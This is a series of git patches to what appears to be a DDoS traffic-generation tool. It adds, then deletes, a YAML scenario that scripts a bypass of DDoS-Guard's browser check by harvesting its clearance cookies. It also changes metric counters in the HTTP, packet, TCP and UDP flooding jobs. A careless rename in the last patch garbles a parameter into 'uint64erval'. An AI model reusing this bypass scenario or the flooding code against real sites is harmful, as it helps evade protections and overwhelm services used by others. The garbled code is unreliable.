From a59f59427b77d4e213cba1f3cc28421f37caf93b Mon Sep 17 00:00:00 2001 From: arriven Date: Thu, 10 Mar 2022 12:31:09 +0200 Subject: [PATCH 1/4] Starting draft (use in educational purposes only) --- config/examples/ddos-guard.yaml | 66 +++++++++++++++++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 config/examples/ddos-guard.yaml diff --git a/config/examples/ddos-guard.yaml b/config/examples/ddos-guard.yaml new file mode 100644 index 00000000..ffa1f02e --- /dev/null +++ b/config/examples/ddos-guard.yaml @@ -0,0 +1,66 @@ +jobs: + - type: sequence + args: + jobs: + - type: set-value + name: useragent + args: + value: "{{ random_user_agent }}" + - type: log + args: + text: 'user-agent: {{ .Value (ctx_key "data.useragent") }}' + - type: http-request + name: initial + args: + method: GET + path: "https://ddos-guard.net" + headers: + User-Agent: '{{ .Value (ctx_key "data.useragent") }}' + Accept: "text/html" + Accept-Language: "en-US" + Connection: "keep-alive" + Sec-Fetch-Dest: "document" + Sec-Fetch-Mode: "navigate" + Sec-Fetch-Site: "none" + Sec-Fetch-User: "?1" + TE: "trailers" + DNT: "1" + - type: log + args: + text: 'body: {{ index (.Value (ctx_key "data.initial")) "response" "body" }}' + - type: log + args: + text: 'headers: {{ index (.Value (ctx_key "data.initial")) "response" "headers" }}' + - type: log + args: + text: 'cookies: {{ index (.Value (ctx_key "data.initial")) "response" "cookies" }}' + - type: http-request + name: check + args: + method: GET + path: "https://check.ddos-guard.net/check.js" + headers: + User-Agent: '{{ .Value (ctx_key "data.useragent") }}' + Accept: "*/*" + Accept-Language: "en-US,en;q=0.5" + Accept-Encoding: "gzip, deflate" + Referer: "https://ddos-guard.net" + Cookie: cookieString(c) #TODO + Sec-Fetch-Dest: "script" + Sec-Fetch-Mode: "no-cors" + Sec-Fetch-Site: "cross-site" + - type: set-value + name: check-body + args: + value: '{{ index (.Value (ctx_key "data.check")) "response" "body"}}' + - type: set-value + name: check-body-tmp + args: + value: '{{ index (split (.Value (ctx_key "data.check-body")) "/.well-known/ddos-guard/id/") 1 }}' + - type: set-value + name: id + args: + value: '{{ index (split (index (split (.Value (ctx_key "data.check-body")) "/.well-known/ddos-guard/id/") 1) "''") 0 }}' + - type: log + args: + text: '{{ .Value (ctx_key "data.id") }}' From f99eb1346c213af5773c2bcfce2966649cb20fe3 Mon Sep 17 00:00:00 2001 From: arriven Date: Thu, 10 Mar 2022 17:14:03 +0200 Subject: [PATCH 2/4] ddos-guard example --- config/examples/ddos-guard.yaml | 57 ++++++++++++++++++++++++++------- 1 file changed, 45 insertions(+), 12 deletions(-) diff --git a/config/examples/ddos-guard.yaml b/config/examples/ddos-guard.yaml index ffa1f02e..ca6ebdec 100644 --- a/config/examples/ddos-guard.yaml +++ b/config/examples/ddos-guard.yaml @@ -1,3 +1,5 @@ +# this scenario copies the one from https://git.gay/a/ddos-guard-bypass/src/branch/master/index.js +# it is here for educational purposes only and is meant to showcase the capabilities of the tool jobs: - type: sequence args: @@ -27,13 +29,7 @@ jobs: DNT: "1" - type: log args: - text: 'body: {{ index (.Value (ctx_key "data.initial")) "response" "body" }}' - - type: log - args: - text: 'headers: {{ index (.Value (ctx_key "data.initial")) "response" "headers" }}' - - type: log - args: - text: 'cookies: {{ index (.Value (ctx_key "data.initial")) "response" "cookies" }}' + text: '{{ cookie_string (index (.Value (ctx_key "data.initial")) "response" "cookies") }}' - type: http-request name: check args: @@ -45,7 +41,7 @@ jobs: Accept-Language: "en-US,en;q=0.5" Accept-Encoding: "gzip, deflate" Referer: "https://ddos-guard.net" - Cookie: cookieString(c) #TODO + Cookie: '{{ cookie_string (index (.Value (ctx_key "data.initial")) "response" "cookies") }}' Sec-Fetch-Dest: "script" Sec-Fetch-Mode: "no-cors" Sec-Fetch-Site: "cross-site" @@ -53,10 +49,6 @@ jobs: name: check-body args: value: '{{ index (.Value (ctx_key "data.check")) "response" "body"}}' - - type: set-value - name: check-body-tmp - args: - value: '{{ index (split (.Value (ctx_key "data.check-body")) "/.well-known/ddos-guard/id/") 1 }}' - type: set-value name: id args: @@ -64,3 +56,44 @@ jobs: - type: log args: text: '{{ .Value (ctx_key "data.id") }}' + - type: http-request + name: final-cookies-request + args: + method: GET + path: 'https://ddos-guard.net/.well-known/ddos-guard/id/{{ .Value (ctx_key "data.id") }}' + headers: + User-Agent: '{{ .Value (ctx_key "data.useragent") }}' + Accept: "image/webp,*/*" + Accept-Language: "en-US,en;q=0.5" + Accept-Encoding: "gzip, deflate" + Cache-Control: "no-cache" + Referer: https://ddos-guard.net + Cookie: '{{ cookie_string (index (.Value (ctx_key "data.initial")) "response" "cookies") }}' + Sec-Fetch-Dest: "script" + Sec-Fetch-Mode: "no-cors" + Sec-Fetch-Site: "cross-site" + - type: set-value + name: final-cookies + args: + value: '{{ cookie_string (index (.Value (ctx_key "data.final-cookies-request")) "response" "cookies") }}' + - type: log + args: + text: 'cookies: {{ .Value (ctx_key "data.final-cookies") }}' + - type: http-request + name: actual-request + args: + method: GET + path: https://ddos-guard.net + headers: + User-Agent: '{{ .Value (ctx_key "data.useragent") }}' + Referer: https://ddos-guard.net/en + Cookie: '{{ .Value (ctx_key "data.final-cookies") }}' + - type: log + args: + text: 'body: {{ index (.Value (ctx_key "data.actual-request")) "response" "body" }}' + - type: log + args: + text: 'headers: {{ index (.Value (ctx_key "data.actual-request")) "response" "headers" }}' + - type: log + args: + text: 'cookies: {{ index (.Value (ctx_key "data.actual-request")) "response" "cookies" }}' From 0e553707367fe96d96548fd71a20c03c834423ff Mon Sep 17 00:00:00 2001 From: arriven Date: Thu, 10 Mar 2022 17:14:35 +0200 Subject: [PATCH 3/4] move ddos-guard example into advanced folder --- config/examples/ddos-guard.yaml | 99 --------------------------------- 1 file changed, 99 deletions(-) delete mode 100644 config/examples/ddos-guard.yaml diff --git a/config/examples/ddos-guard.yaml b/config/examples/ddos-guard.yaml deleted file mode 100644 index ca6ebdec..00000000 --- a/config/examples/ddos-guard.yaml +++ /dev/null @@ -1,99 +0,0 @@ -# this scenario copies the one from https://git.gay/a/ddos-guard-bypass/src/branch/master/index.js -# it is here for educational purposes only and is meant to showcase the capabilities of the tool -jobs: - - type: sequence - args: - jobs: - - type: set-value - name: useragent - args: - value: "{{ random_user_agent }}" - - type: log - args: - text: 'user-agent: {{ .Value (ctx_key "data.useragent") }}' - - type: http-request - name: initial - args: - method: GET - path: "https://ddos-guard.net" - headers: - User-Agent: '{{ .Value (ctx_key "data.useragent") }}' - Accept: "text/html" - Accept-Language: "en-US" - Connection: "keep-alive" - Sec-Fetch-Dest: "document" - Sec-Fetch-Mode: "navigate" - Sec-Fetch-Site: "none" - Sec-Fetch-User: "?1" - TE: "trailers" - DNT: "1" - - type: log - args: - text: '{{ cookie_string (index (.Value (ctx_key "data.initial")) "response" "cookies") }}' - - type: http-request - name: check - args: - method: GET - path: "https://check.ddos-guard.net/check.js" - headers: - User-Agent: '{{ .Value (ctx_key "data.useragent") }}' - Accept: "*/*" - Accept-Language: "en-US,en;q=0.5" - Accept-Encoding: "gzip, deflate" - Referer: "https://ddos-guard.net" - Cookie: '{{ cookie_string (index (.Value (ctx_key "data.initial")) "response" "cookies") }}' - Sec-Fetch-Dest: "script" - Sec-Fetch-Mode: "no-cors" - Sec-Fetch-Site: "cross-site" - - type: set-value - name: check-body - args: - value: '{{ index (.Value (ctx_key "data.check")) "response" "body"}}' - - type: set-value - name: id - args: - value: '{{ index (split (index (split (.Value (ctx_key "data.check-body")) "/.well-known/ddos-guard/id/") 1) "''") 0 }}' - - type: log - args: - text: '{{ .Value (ctx_key "data.id") }}' - - type: http-request - name: final-cookies-request - args: - method: GET - path: 'https://ddos-guard.net/.well-known/ddos-guard/id/{{ .Value (ctx_key "data.id") }}' - headers: - User-Agent: '{{ .Value (ctx_key "data.useragent") }}' - Accept: "image/webp,*/*" - Accept-Language: "en-US,en;q=0.5" - Accept-Encoding: "gzip, deflate" - Cache-Control: "no-cache" - Referer: https://ddos-guard.net - Cookie: '{{ cookie_string (index (.Value (ctx_key "data.initial")) "response" "cookies") }}' - Sec-Fetch-Dest: "script" - Sec-Fetch-Mode: "no-cors" - Sec-Fetch-Site: "cross-site" - - type: set-value - name: final-cookies - args: - value: '{{ cookie_string (index (.Value (ctx_key "data.final-cookies-request")) "response" "cookies") }}' - - type: log - args: - text: 'cookies: {{ .Value (ctx_key "data.final-cookies") }}' - - type: http-request - name: actual-request - args: - method: GET - path: https://ddos-guard.net - headers: - User-Agent: '{{ .Value (ctx_key "data.useragent") }}' - Referer: https://ddos-guard.net/en - Cookie: '{{ .Value (ctx_key "data.final-cookies") }}' - - type: log - args: - text: 'body: {{ index (.Value (ctx_key "data.actual-request")) "response" "body" }}' - - type: log - args: - text: 'headers: {{ index (.Value (ctx_key "data.actual-request")) "response" "headers" }}' - - type: log - args: - text: 'cookies: {{ index (.Value (ctx_key "data.actual-request")) "response" "cookies" }}' From 481bd66e2b4514b29317b374dfd28cec84b5eba8 Mon Sep 17 00:00:00 2001 From: arriven Date: Thu, 10 Mar 2022 17:40:18 +0200 Subject: [PATCH 4/4] change metrics value types to uint64 --- src/jobs/http.go | 8 ++++---- src/jobs/packetgen.go | 2 +- src/jobs/rawnet.go | 6 +++--- src/metrics/metrics.go | 20 ++++++++++---------- 4 files changed, 18 insertions(+), 18 deletions(-) diff --git a/src/jobs/http.go b/src/jobs/http.go index 40edfd88..8d766e85 100644 --- a/src/jobs/http.go +++ b/src/jobs/http.go @@ -69,10 +69,10 @@ func singleRequestJob(ctx context.Context, globalConfig GlobalConfig, args Args, dataSize += len(key) + len(value) } - metrics.Default.Write(metrics.Traffic, uuid.New().String(), dataSize) + metrics.Default.Write(metrics.Traffic, uuid.New().String(), uint64(dataSize)) err = sendFastHTTPRequest(client, req, resp, debug) if err == nil { - metrics.Default.Write(metrics.ProcessedTraffic, uuid.New().String(), dataSize) + metrics.Default.Write(metrics.ProcessedTraffic, uuid.New().String(), uint64(dataSize)) } headers := make(map[string]string) resp.Header.VisitAll(func(key []byte, value []byte) { @@ -156,13 +156,13 @@ func fastHTTPJob(ctx context.Context, globalConfig GlobalConfig, args Args, debu dataSize += len(key) + len(value) } - trafficMonitor.Add(dataSize) + trafficMonitor.Add(uint64(dataSize)) if err := sendFastHTTPRequest(client, req, nil, debug); err != nil { if debug { log.Printf("Error sending request %v: %v", req, err) } } else { - processedTrafficMonitor.Add(dataSize) + processedTrafficMonitor.Add(uint64(dataSize)) } } diff --git a/src/jobs/packetgen.go b/src/jobs/packetgen.go index 376a7ed6..429a2df3 100644 --- a/src/jobs/packetgen.go +++ b/src/jobs/packetgen.go @@ -100,7 +100,7 @@ func packetgenJob(ctx context.Context, globalConfig GlobalConfig, args Args, deb protocolLabelValue, metrics.StatusSuccess) - trafficMonitor.Add(len) + trafficMonitor.Add(uint64(len)) } return nil, nil diff --git a/src/jobs/rawnet.go b/src/jobs/rawnet.go index 2b23efbd..fb9043f2 100644 --- a/src/jobs/rawnet.go +++ b/src/jobs/rawnet.go @@ -69,7 +69,7 @@ func tcpJob(ctx context.Context, globalConfig GlobalConfig, args Args, debug boo body := []byte(templates.Execute(bodyTpl, nil)) _, err = conn.Write(body) - trafficMonitor.Add(len(body)) + trafficMonitor.Add(uint64(len(body))) if err != nil { metrics.IncRawnetTCP(tcpAddr.String(), metrics.StatusFail) @@ -81,7 +81,7 @@ func tcpJob(ctx context.Context, globalConfig GlobalConfig, args Args, debug boo if debug { log.Printf("%s finished at %d", jobConfig.Address, time.Now().Unix()) } - processedTrafficMonitor.Add(len(body)) + processedTrafficMonitor.Add(uint64(len(body))) metrics.IncRawnetTCP(tcpAddr.String(), metrics.StatusSuccess) } } @@ -139,7 +139,7 @@ func udpJob(ctx context.Context, globalConfig GlobalConfig, args Args, debug boo log.Printf("%s failed at %d with err: %s", jobConfig.Address, time.Now().Unix(), err.Error()) } } else { - trafficMonitor.Add(len(body)) + trafficMonitor.Add(uint64(len(body))) metrics.IncRawnetUDP(udpAddr.String(), metrics.StatusSuccess) if debug { diff --git a/src/metrics/metrics.go b/src/metrics/metrics.go index d1f7dee2..551b4f79 100644 --- a/src/metrics/metrics.go +++ b/src/metrics/metrics.go @@ -54,17 +54,17 @@ func init() { Default.trackers[ProcessedTraffic] = &metricTracker{} } -func (ms *Storage) Write(name, jobID string, value int) { +func (ms *Storage) Write(name, jobID string, value uint64) { if tracker, ok := ms.trackers[name]; ok { tracker.metrics.Store(jobID, value) } } -func (ms *Storage) Read(name string) int { - sum := 0 +func (ms *Storage) Read(name string) uint64 { + sum := uint64(0) if tracker, ok := ms.trackers[name]; ok { tracker.metrics.Range(func(k, v interface{}) bool { - if value, ok := v.(int); ok { + if value, ok := v.(uint64); ok { sum = sum + value } return true @@ -84,16 +84,16 @@ type Writer struct { ms *Storage jobID string name string - value int + value uint64 } // Add used to increase metric value by a specific amount -func (w *Writer) Add(value int) { +func (w *Writer) Add(value uint64) { w.value = w.value + value } // Set used to set metric to a specific value -func (w *Writer) Set(value int) { +func (w *Writer) Set(value uint64) { w.value = value } @@ -102,9 +102,9 @@ func (w *Writer) Flush() { w.ms.Write(w.name, w.jobID, w.value) } -// Update updates writer with a set interval -func (w *Writer) Update(ctx context.Context, interval time.Duration) { - ticker := time.NewTicker(interval) +// Update updates writer with a set uint64erval +func (w *Writer) Update(ctx context.Context, uint64erval time.Duration) { + ticker := time.NewTicker(uint64erval) defer ticker.Stop() for { select {